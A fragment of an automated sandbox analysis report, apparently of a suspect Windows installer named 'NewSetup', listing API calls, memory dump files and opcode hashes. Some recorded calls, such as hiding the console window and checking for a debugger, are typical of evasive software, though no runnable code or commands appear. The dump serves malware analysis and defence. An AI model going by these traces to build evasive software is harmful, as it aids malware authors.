                                                                                                      • GetForegroundWindow.USER32 ref: 0043D1AA
                                                                                                      • GetForegroundWindow.USER32 ref: 0043D1C0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ForegroundWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2020703349-0
                                                                                                      • Opcode ID: c4e5699213e8c8392b4d3a6b569e32cded55f0697a2c8afc432cfcaf34d365f3
                                                                                                      • Instruction ID: 3dbaf8c9d4b4cdac177c22d0d0fe4f5d6608661041d7d8772ec8f984dcac4e78
                                                                                                      • Opcode Fuzzy Hash: c4e5699213e8c8392b4d3a6b569e32cded55f0697a2c8afc432cfcaf34d365f3
                                                                                                      • Instruction Fuzzy Hash: ADD027FDD5310057C94C5B31ED1E41F36119B9B355714443DF40342372CD594807C54A

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 409 40c865-40c89b CoInitializeSecurity
                                                                                                      APIs
                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C877
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeSecurity
                                                                                                      • String ID:
                                                                                                      • API String ID: 640775948-0
                                                                                                      • Opcode ID: 28478618b8bf013e95b7138ec7a52dc306bad92f05b26cb4ec7a7e52e234d450
                                                                                                      • Instruction ID: 1e3e2e598fd455d471313fdc32214382811b636f90739155dff12dd62cbeea8f
                                                                                                      • Opcode Fuzzy Hash: 28478618b8bf013e95b7138ec7a52dc306bad92f05b26cb4ec7a7e52e234d450
                                                                                                      • Instruction Fuzzy Hash: 97E05E79BC52047BF6284B18DD43F84220243C6B21F3D8224B310EE7D8CDF8A012420D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 410 40c830-40c861 CoInitializeEx
                                                                                                      APIs
                                                                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C843
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2538663250-0
                                                                                                      • Opcode ID: 9db20bcde595f6b808fc88834a66c7a984b9a00e406f242fa5d17b3b7a9d0ad7
                                                                                                      • Instruction ID: e5954fe18ae31227c9ebc57c7171ed4deaa3088f77e6c40460de058f9c649bee
                                                                                                      • Opcode Fuzzy Hash: 9db20bcde595f6b808fc88834a66c7a984b9a00e406f242fa5d17b3b7a9d0ad7
                                                                                                      • Instruction Fuzzy Hash: F2D05E256A41446BD348A76DAC46F2236989B87716F840239F252966D2E9506810C26A
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(00000000,?,0022E58D), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00228363), ref: 0022C210
                                                                                                      • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0023138F
                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 002313CD
                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 002313E0
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00231428
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00231443
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                      • String ID: ,K$
                                                                                                      • API String ID: 415426439-3784840329
                                                                                                      • Opcode ID: c7be95c63bb6bc9c741948923d4437d3f4883f4f50c25e8ef63164949d9f5bf8
                                                                                                      • Instruction ID: 5b95c0d679e26cda28a9704b7f35eaebb26159667a6d840a939b8c488d665690
                                                                                                      • Opcode Fuzzy Hash: c7be95c63bb6bc9c741948923d4437d3f4883f4f50c25e8ef63164949d9f5bf8
                                                                                                      • Instruction Fuzzy Hash: 9D5171B1A20216ABDF10EFA5DC85ABE77B8FF09700F144469FA05E7190E7709A74CB61
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,002313BD,00000002,00000000,?,?,?,002313BD,?,00000000), ref: 00231AA0
                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,002313BD,00000002,00000000,?,?,?,002313BD,?,00000000), ref: 00231AC9
                                                                                                      • GetACP.KERNEL32(?,?,002313BD,?,00000000), ref: 00231ADE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 2299586839-711371036
                                                                                                      • Opcode ID: f1b2e8fa678b2577f55673386be907556e972469d4d7b49965497b18044f3758
                                                                                                      • Instruction ID: 951cd5ad9889f300755748124baa1fd8807fdd59332a71b85a7f307f65e2c015
                                                                                                      • Opcode Fuzzy Hash: f1b2e8fa678b2577f55673386be907556e972469d4d7b49965497b18044f3758
                                                                                                      • Instruction Fuzzy Hash: 7921C8A2B32102ABD734CF54C904A9773AAEF55F56F568425E94AD7200EB32DD70C390
                                                                                                      APIs
                                                                                                        • Part of subcall function 00211240: _strlen.LIBCMT ref: 002112BA
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00212046
                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0021206B
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0021207A
                                                                                                      • _strlen.LIBCMT ref: 002120CD
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 002121FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFileHandle_strlen$ReadSize
                                                                                                      • String ID:
                                                                                                      • API String ID: 1490117831-0
                                                                                                      • Opcode ID: 47623733fa7ee54ee4fdf86bb6e208f8f51ec27f6a21ac6655cceb4ffd88667f
                                                                                                      • Instruction ID: eb532e572796b3f3e39991f8e5986cb4468f3245fd936298fc6b416a62fe4f8c
                                                                                                      • Opcode Fuzzy Hash: 47623733fa7ee54ee4fdf86bb6e208f8f51ec27f6a21ac6655cceb4ffd88667f
                                                                                                      • Instruction Fuzzy Hash: 9471B0B2C10219DBCB10DFA4DC487EEBBF5BF59310F140629F814A7391E73599A98BA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                      • Instruction ID: 3facbbe92dc0a9d2c90f907b5c31563bd54093f51d58ff8732c4bf3485a0c294
                                                                                                      • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                      • Instruction Fuzzy Hash: C6025C71E1022AABDF14CFA8D9807AEF7B5FF48314F24826AD519E7341D731AA51CB90
                                                                                                      APIs
                                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002320D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst
                                                                                                      • String ID:
                                                                                                      • API String ID: 1974802433-0
                                                                                                      • Opcode ID: 3cae16eb0c087a59e49f766ac398d9c65aa5d983da66197a4e1bc0309976b24c
                                                                                                      • Instruction ID: b8b0a968a795184fe3148dd8b43108f981ff209820518f5900058d2e2a35ee7f
                                                                                                      • Opcode Fuzzy Hash: 3cae16eb0c087a59e49f766ac398d9c65aa5d983da66197a4e1bc0309976b24c
                                                                                                      • Instruction Fuzzy Hash: 9B7106F192516AAFDF259F38DC8DAFAB7B9AB05300F1441D9E548A3211DB318E99CF10
                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0021F8F5
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0021F9C1
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0021F9DA
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0021F9E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 254469556-0
                                                                                                      • Opcode ID: 610ac620df78359d5bc2e7c895bee6cac9fa160d7ce336519302b15cc80a53c5
                                                                                                      • Instruction ID: 09cf83fd3a340b85b75645ac4b44f10f89b445856811cb8c842bc576a7c036eb
                                                                                                      • Opcode Fuzzy Hash: 610ac620df78359d5bc2e7c895bee6cac9fa160d7ce336519302b15cc80a53c5
                                                                                                      • Instruction Fuzzy Hash: DC31F9B5D11219EBDF61EFA4D9497CDBBF8AF18300F1041AAE40CAB250EB719A84CF45
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                                                      • String ID:
                                                                                                      • API String ID: 127012223-0
                                                                                                      • Opcode ID: e0b3d2d27e173046c6de87382c7fef21ec97912d1f08c6bdacc1799ccf0b37cc
                                                                                                      • Instruction ID: 7a5cefb00a04c6fd042b37d37fa4525399ef89b1fee7b6926023e32c171cd005
                                                                                                      • Opcode Fuzzy Hash: e0b3d2d27e173046c6de87382c7fef21ec97912d1f08c6bdacc1799ccf0b37cc
                                                                                                      • Instruction Fuzzy Hash: DE71E7B2A2020A6BDF219E648C41FEFB7BADF55314F290466F884A7191E775CC60CB52
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0021FE70
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0021FE9C
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0021FEDB
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0021FEF8
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0021FF37
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0021FF54
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0021FF96
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0021FFB9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                      • String ID:
                                                                                                      • API String ID: 2040435927-0
                                                                                                      • Opcode ID: 91eff6058527918cd29c689d7e4ed7930ffdc23d1b42afed78fcffce93657c5c
                                                                                                      • Instruction ID: fa9bf74597e8a0d97f2f4ec13a97494f83cdabb9b4c2c301b2e3505502742382
                                                                                                      • Opcode Fuzzy Hash: 91eff6058527918cd29c689d7e4ed7930ffdc23d1b42afed78fcffce93657c5c
                                                                                                      • Instruction Fuzzy Hash: E251A07262021AAFEB604F60CD49FEA7BE8EF62750F154435F924DA590D7B18CA18B50
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3213747228-0
                                                                                                      • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                      • Instruction ID: 9500c5a6f05806044f6abd7b3a729b789b69422ca0e892039e2977a19dc507d9
                                                                                                      • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                      • Instruction Fuzzy Hash: 2FB13772A20366BFDF218FA4DD41BAE7BB5EF15310F154175E844AF282D2749D21CBA0
                                                                                                      APIs
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00220D77
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00220D7F
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00220E08
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00220E33
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00220E88
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                      • Opcode ID: e076595a65aaf0bf318da848514dd798f96f4dde23e10e2ec15e47102a81cc20
                                                                                                      • Instruction ID: 4d3318316a1b0e04de3c09c4cd12206ca94ada09b2067e026e4591d499587d5d
                                                                                                      • Opcode Fuzzy Hash: e076595a65aaf0bf318da848514dd798f96f4dde23e10e2ec15e47102a81cc20
                                                                                                      • Instruction Fuzzy Hash: 4B41F230A20229BBCF11DFA8E884A9EBBA6EF05314F158455E8146B393C731AD61CF90
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00213CA5
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00213CBF
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00213CE0
                                                                                                      • __Getctype.LIBCPMT ref: 00213D92
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00213DD8
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                      • String ID: e.$
                                                                                                      • API String ID: 3087743877-2253995300
                                                                                                      • Opcode ID: 416dd5b16cf2bb9bc6c7cd15da4515f391681d939163b193c231bb021d65625c
                                                                                                      • Instruction ID: a2441f7eac25f9c8aac96be948cad35375c2aefc916c44f6c766b37f380f2123
                                                                                                      • Opcode Fuzzy Hash: 416dd5b16cf2bb9bc6c7cd15da4515f391681d939163b193c231bb021d65625c
                                                                                                      • Instruction Fuzzy Hash: 9D4177B5E112158BCB10DF98E844BEABBF2BFA4720F148119D8156B391DB35AA90CF91
                                                                                                      APIs
                                                                                                      • GetConsoleWindow.KERNEL32 ref: 002124DD
                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 002124E6
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00212524
                                                                                                        • Part of subcall function 0021F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0021253A,?,?,00000000), ref: 0021F129
                                                                                                        • Part of subcall function 0021F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,0021253A,?,?,00000000), ref: 0021F142
                                                                                                        • Part of subcall function 0021F11D: CloseHandle.KERNEL32(?,?,?,0021253A,?,?,00000000), ref: 0021F154
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00212567
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00212578
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00212589
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 0021259A
                                                                                                      Similarity
                                                                                                      • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 3956949563-0
                                                                                                      • Opcode ID: 619efaeb86420f7f58becf9a7e0f5f9bd9f72a2d21dfd228edf1d2f3c913ea32
                                                                                                      • Instruction ID: dac1beaca46dac0bb3313fe4ff1ee6f11dd78dce4d06aaa2fc5cf25f8b1415c0
                                                                                                      • Opcode Fuzzy Hash: 619efaeb86420f7f58becf9a7e0f5f9bd9f72a2d21dfd228edf1d2f3c913ea32
                                                                                                      • Instruction Fuzzy Hash: D221E6F2D50215ABDF10AF94DC46BDE7AF8AF14700F080165F50876281E7B695B4CBE2
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,0022D01A,00211170,0021AA08,?,?), ref: 0022CFCC
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 3664257935-537541572
                                                                                                      • Opcode ID: 9c87e71e5233ec3ad1ac132d569e9c36b365932c413ee922c2a1f3aa5126fa90
                                                                                                      • Instruction ID: 565aefc227ced5ad5257567fe2b2c933cfdc61f65f9d5bc2f76fcf075f646e00
                                                                                                      • Opcode Fuzzy Hash: 9c87e71e5233ec3ad1ac132d569e9c36b365932c413ee922c2a1f3aa5126fa90
                                                                                                      • Instruction Fuzzy Hash: 3D21F635A21322BBC7318FA5FD48A5E7759AB46360F350113FD06A7690D770ED20CAD0
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00220086
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00220094
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 002200A5
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                      • API String ID: 667068680-1047828073
                                                                                                      • Opcode ID: 5a800ae7c490712f883fed0b49dceacdd7b77fda7a6273b05685b17cecaae006
                                                                                                      • Instruction ID: 8fceee0cfdaf3c1705b08051bc96e4c1af7491eeadb142179e3f2bac567e779e
                                                                                                      • Opcode Fuzzy Hash: 5a800ae7c490712f883fed0b49dceacdd7b77fda7a6273b05685b17cecaae006
                                                                                                      • Instruction Fuzzy Hash: 0AD0C979562620AB8354AFF8FC4D98A3EB9FA0B7123024553F841D2360DFB486108B9A
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2445ab7ba260ff43b9c1b356cadcd309c12400249bf2b6f03e9b2a270239f5d1
                                                                                                      • Instruction ID: 13da66b86169384ea0065df5e7e8fdfdd5df5775139059c1dc43f2106f920927
                                                                                                      • Opcode Fuzzy Hash: 2445ab7ba260ff43b9c1b356cadcd309c12400249bf2b6f03e9b2a270239f5d1
                                                                                                      • Instruction Fuzzy Hash: 60B13AF4E28666AFDB01CFA8D885BBE7BB4BF06300F144199E90957291C7719D61CF90
                                                                                                      APIs
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219C97
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219CA8
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219CBC
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219CDD
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219CEE
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219D06
                                                                                                      Similarity
                                                                                                      • API ID: Cpp_errorThrow_std::_
                                                                                                      • String ID:
                                                                                                      • API String ID: 2134207285-0
                                                                                                      • Opcode ID: b5afe0aabec58d16ab43fc4a28ddf67d95b06c1d020bcbd0b9bfd5f1ac2090ea
                                                                                                      • Instruction ID: ec26ff9712bb04ebf6b99e97dee21df0dc24517e60e02aec0373de0a92863111
                                                                                                      • Opcode Fuzzy Hash: b5afe0aabec58d16ab43fc4a28ddf67d95b06c1d020bcbd0b9bfd5f1ac2090ea
                                                                                                      • Instruction Fuzzy Hash: 8A41C2B1910745CBDB309F6089117EFB7F4AF69324F18062ED9BA162D1D37165E0CB92
                                                                                                      APIs
